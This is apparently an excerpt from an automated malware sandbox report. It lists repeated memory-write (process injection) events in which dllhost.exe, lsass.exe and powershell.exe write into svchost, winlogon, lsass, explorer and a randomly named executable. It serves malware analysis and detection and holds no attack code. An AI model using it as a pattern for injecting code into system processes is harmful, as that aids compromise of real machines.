Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E0D0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3D2B0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: ECCD48B010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE14340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8B30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1220000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AFE4460000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 27C93250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 24463CE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 227C0130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23A44F90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F530850000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13376160000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3010000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2A50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 11B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: F90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 980000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1510000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2870000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1240000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2620000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 850000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 21F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 840000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1620000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 15E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: E30000
